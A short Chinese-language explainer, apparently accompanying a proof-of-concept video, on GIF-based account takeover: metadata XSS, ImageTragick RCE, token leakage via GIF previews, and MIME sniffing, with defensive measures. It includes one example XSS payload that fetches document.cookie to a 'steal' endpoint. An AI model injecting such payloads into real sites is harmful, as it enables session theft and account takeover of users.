GIF 账户接管漏洞演示视频（PoC）。

GIF 账户接管漏洞（GIF Account Takeover） 通常是指由于 Web 应用在处理 GIF 图片（或通过图片上传/解析组件）时，存在逻辑缺陷或安全配置不当，导致攻击者可以通过诱导受害者加载一张“特制”的 GIF 图，从而窃取其账户权限。

这并不是一种单一的漏洞，通常是几种经典漏洞的“变体”应用。以下是几种常见的技术原理：

1. 存储型 XSS（通过文件元数据或解析错误）

这是最常见的情况。很多网站允许用户上传 GIF 并在个人资料页展示。

• 原理： 攻击者在 GIF 文件的 Metadata（元数据） 或 Comment（注释） 字段中插入恶意脚本（如 <script>fetch('.../steal?cookie=' + document.cookie)</script>）。
• 触发： 如果后端在处理图片时，为了展示图片信息而直接将这些元数据渲染到 HTML 中且未经过滤，脚本就会在受害者浏览器中执行，导致 Cookie 被窃取，进而实现账户接管。

2. 远程代码执行 (RCE) – 图片处理库漏洞

如果 Web 服务器使用的底层图片处理库（如 ImageMagick 或 GraphicsMagick）存在漏洞。

• 原理： 历史上著名的 ImageTragick (CVE-2016-3714) 漏洞。攻击者可以构造一个伪装成 GIF 的文件，内容其实是包含系统命令的脚本。
• 后果： 当服务器尝试对这张 GIF 进行缩放、裁剪或格式转换时，会触发系统命令。攻击者可以直接控制服务器，拿下所有用户的账户数据库。

3. 基于 OAuth/第三方集成的授权泄露

在一些集成类应用（如 Slack, Discord）中，如果漏洞发生在 GIF 搜索或预览功能中：

• 原理： 应用在请求第三方 GIF 供应商（如 Giphy）时，可能会由于代码逻辑问题（如 SSRF 或错误的重定向），将用户的 Session Token 或 OAuth 授权码 附加在请求头中。
• 后果： 攻击者可以伪造一个 GIF 链接，当应用试图“预览”该 GIF 时，会将敏感令牌发送到攻击者的服务器。

4. 浏览器的“内容嗅探”（MIME Sniffing）

• 原理： 攻击者上传一个看起来像 GIF 但内容包含 HTML 代码的文件。
• 触发： 如果服务器设置的 Content-Type 不严格，或者浏览器忽略了服务器的声明，试图自动识别文件类型（Content Sniffing），它可能会把 GIF 当作网页运行，从而执行其中的 JavaScript。

如何防范？

• 严格过滤元数据： 在存储图片前，使用工具（如 exiftool）剥离所有元数据。
• 强制 MIME 类型： 设置 HTTP 响应头 X-Content-Type-Options: nosniff。
• 内容隔离： 将用户上传的资源放在独立的域名下（如 user-content.com），即使发生 XSS 漏洞，也无法直接读取主站的 Cookie。
• 更新组件： 确保 ImageMagick 等图片解析库始终处于最新版本。

总结： 这种漏洞之所以被拍成 PoC 视频，是因为它的隐蔽性极高。受害者往往只是在聊天框里看了一眼动图，或者点击了一个正常的链接，账户就已经易主了。